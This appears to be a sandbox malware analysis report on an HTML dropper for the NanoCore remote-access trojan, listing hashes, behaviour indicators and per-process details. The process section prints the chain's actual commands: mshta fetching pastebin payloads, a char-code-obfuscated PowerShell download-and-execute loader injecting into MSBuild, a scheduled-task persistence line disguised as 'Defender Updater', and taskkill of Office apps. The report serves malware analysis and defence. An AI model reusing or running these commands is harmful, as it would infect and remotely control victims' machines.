General Info

File name

8.html

Full analysis
https://app.any.run/tasks/1ca27cb5-dc96-4f73-b460-3dab8cd87684
Verdict
Malicious activity
Analysis date
7/11/2019, 16:16:07
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

rat

nanocore

Indicators:

MIME:
text/html
File info:
HTML document, ASCII text, with very long lines
MD5

6e9c135a194306432c54952a5eda2a6e

SHA1

38d91d48f050f925cb33f8a259cbfb15eafc89c3

SHA256

1649d105a7a5c3ad68a16d1bd6c21b36e30273a3b9f7fc25e9747d31ef98de85

SSDEEP

768:7+3eyHHvPWdoV20rOwHBgFhoCiote2SeAIk:7+3LHH2dw20r3HBjCiotdk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distored by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
300 seconds
Additional time used
240 seconds
Fakenet option
off
Heavy Evaision option
on
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (75.0.3770.100)
  • Google Update Helper (1.3.34.7)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.7.2 (4.7.03062)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.21.27702 (14.21.27702.2)
  • Microsoft Visual C++ 2019 X86 Additional Runtime - 14.21.27702 (14.21.27702)
  • Microsoft Visual C++ 2019 X86 Minimum Runtime - 14.21.27702 (14.21.27702)
  • Mozilla Firefox 67.0.4 (x86 en-US) (67.0.4)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • Update for Microsoft .NET Framework 4.7.2 (KB4087364) (1)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB4019990
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

MALICIOUS SUSPICIOUS INFO
Application was dropped or rewritten from another process
  • MSBuild.exe (PID: 2104)
Loads the Task Scheduler COM API
  • schtasks.exe (PID: 4060)
Changes the autorun value in the registry
  • MSBuild.exe (PID: 2104)
  • mshta.exe (PID: 2632)
NanoCore was detected
  • MSBuild.exe (PID: 2104)
Executes PowerShell scripts
  • mshta.exe (PID: 2632)
Uses Task Scheduler to run other applications
  • mshta.exe (PID: 2632)
Uses TASKKILL.EXE to kill process
  • cmd.exe (PID: 3416)
Creates files in the user directory
  • powershell.exe (PID: 3720)
  • MSBuild.exe (PID: 2104)
  • mshta.exe (PID: 2632)
  • mshta.exe (PID: 3952)
Executable content was dropped or overwritten
  • MSBuild.exe (PID: 2104)
Uses TASKKILL.EXE to kill Office Apps
  • cmd.exe (PID: 3416)
Starts CMD.EXE for commands execution
  • mshta.exe (PID: 2632)
Starts MSHTA.EXE for opening HTA or HTMLS files
  • mshta.exe (PID: 3952)
Application launched itself
  • mshta.exe (PID: 3952)
Reads internet explorer settings
  • mshta.exe (PID: 2632)
  • mshta.exe (PID: 3952)

Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

Static information

TRiD
.html
|   HyperText Markup Language (100%)
EXIF
HTML
viewport:
width=1100
ContentType:
text/html; charset=UTF-8
Generator:
blogger
Rating:
adult
Title:
.: 8 thomas 7.10

Screenshots

Processes

Total processes
51
Monitored processes
10
Malicious processes
4
Suspicious processes
1

Behavior graph

+
start mshta.exe mshta.exe cmd.exe no specs powershell.exe schtasks.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs taskkill.exe no specs #NANOCORE msbuild.exe
Specs description
Program did not start
Integrity level elevation
Task сontains an error or was rebooted
Process has crashed
Task contains several apps running
Executable file was dropped
Debug information is available
Process was injected
Network attacks were detected
Application downloaded the executable file
Actions similar to stealing personal data
Behavior similar to exploiting the vulnerability
Inspected object has sucpicious PE structure
File is detected by antivirus software
CPU overrun
RAM overrun
Process starts the services
Process was added to the startup
Behavior similar to spam
Low-level access to the HDD
Probably Tor was used
System was rebooted
Connects to the network
Known threat

Process information

Click at the process to see the details.

PID
3952
CMD
"C:\Windows\System32\mshta.exe" https://asdadwnixwed.blogspot.com/p/8.html
Path
C:\Windows\System32\mshta.exe
Indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\ole32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\wship6.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\program files\common files\microsoft shared\vgx\vgx.dll
c:\windows\system32\atl.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mlang.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\devobj.dll
c:\windows\system32\imgutil.dll
c:\windows\system32\pngfilt.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\inetcpl.cpl

PID
2632
CMD
"C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/LhpqPv66
Path
C:\Windows\System32\mshta.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft (R) HTML Application host
Version
8.00.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mshta.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\mshtml.dll
c:\windows\system32\psapi.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\user32.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\msls31.dll
c:\windows\system32\version.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\clbcatq.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\sensapi.dll
c:\windows\system32\nlaapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\normaliz.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\wship6.dll
c:\windows\system32\oleacc.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\sxs.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\userenv.dll
c:\windows\system32\wintrust.dll
c:\windows\system32\schannel.dll
c:\windows\system32\credssp.dll
c:\windows\system32\secur32.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\system32\jscript.dll
c:\windows\system32\vbscript.dll
c:\windows\system32\wshom.ocx
c:\windows\system32\mpr.dll
c:\windows\system32\scrrun.dll
c:\windows\system32\propsys.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll

PID
3416
CMD
"C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & exit
Path
C:\Windows\System32\cmd.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Windows Command Processor
Version
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Image
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\apphelp.dll

PID
3720
CMD
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $Mo=@(91,118,111,105,100,93,32,91,83,121,115,116,101,109,46,82,101,102,108,101,99,116,105,111,110,46,65,115,115,101,109,98,108,121,93,58,58,76,111,97,100,87,105,116,104,80,97,114,116,105,97,108,78,97,109,101,40,39,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,39,41,59,36,102,106,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,87,87,87,113,49,100,83,49,39,41,124,73,69,88,59,91,66,121,116,101,91,93,93,36,102,61,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,73,110,116,101,114,97,99,116,105,111,110,93,58,58,67,97,108,108,66,121,110,97,109,101,40,40,78,101,119,45,79,98,106,101,99,116,32,78,101,116,46,87,101,98,67,108,105,101,110,116,41,44,39,68,111,119,110,108,111,97,100,83,116,114,105,110,103,39,44,91,77,105,99,114,111,115,111,102,116,46,86,105,115,117,97,108,66,97,115,105,99,46,67,97,108,108,84,121,112,101,93,58,58,77,101,116,104,111,100,44,39,104,116,116,112,115,58,47,47,112,97,115,116,101,98,105,110,46,99,111,109,47,114,97,119,47,75,121,54,113,118,80,87,103,39,41,46,114,101,112,108,97,99,101,40,39,42,42,39,44,39,48,120,39,41,124,73,69,88,59,91,107,46,72,97,99,107,105,116,117,112,93,58,58,101,120,101,40,39,77,83,66,117,105,108,100,46,101,120,101,39,44,36,102,41);[System.Text.Encoding]::ASCII.GetString($Mo)|IEX
Path
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.visualbas#\08d608378aa405adc844f3cf36974b8c\microsoft.visualbasic.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuration\bc09ad2d49d8535371845cd7532f9271\system.configuration.ni.dll
c:\windows\system32\rasapi32.dll
c:\windows\system32\rasman.dll
c:\windows\system32\rtutils.dll
c:\windows\system32\mswsock.dll
c:\windows\system32\wshtcpip.dll
c:\windows\system32\wship6.dll
c:\windows\system32\winhttp.dll
c:\windows\system32\webio.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\dhcpcsvc6.dll
c:\windows\system32\dhcpcsvc.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\rasadhlp.dll
c:\windows\system32\fwpuclnt.dll
c:\windows\system32\security.dll
c:\windows\system32\credssp.dll
c:\windows\system32\schannel.dll
c:\windows\system32\ncrypt.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\bcryptprimitives.dll
c:\windows\system32\gpapi.dll
c:\windows\microsoft.net\framework\v2.0.50727\msbuild.exe
c:\windows\system32\netutils.dll

PID
4060
CMD
"C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Defender Updater" /tr "mshta.exe http://pastebin.com/raw/b9u9sm5U" /F
Path
C:\Windows\System32\schtasks.exe
Indicators
No indicators
Parent process
mshta.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Manages scheduled tasks
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ktmw32.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\version.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\taskschd.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\xmllite.dll

PID
1144
CMD
taskkill /f /im winword.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3444
CMD
taskkill /f /im excel.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3328
CMD
taskkill /f /im MSPUB.exe
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\netapi32.dll
c:\windows\system32\netutils.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\wkscli.dll
c:\windows\system32\dbghelp.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\winsta.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
3508
CMD
taskkill /f /im POWERPNT.EXE
Path
C:\Windows\system32\taskkill.exe
Indicators
No indicators
Parent process
cmd.exe
User
admin
Integrity Level
MEDIUM
Exit code
128
Version:
Company
Microsoft Corporation
Description
Terminates Processes
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\taskkill.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\version.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\mpr.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\wtsapi32.dll
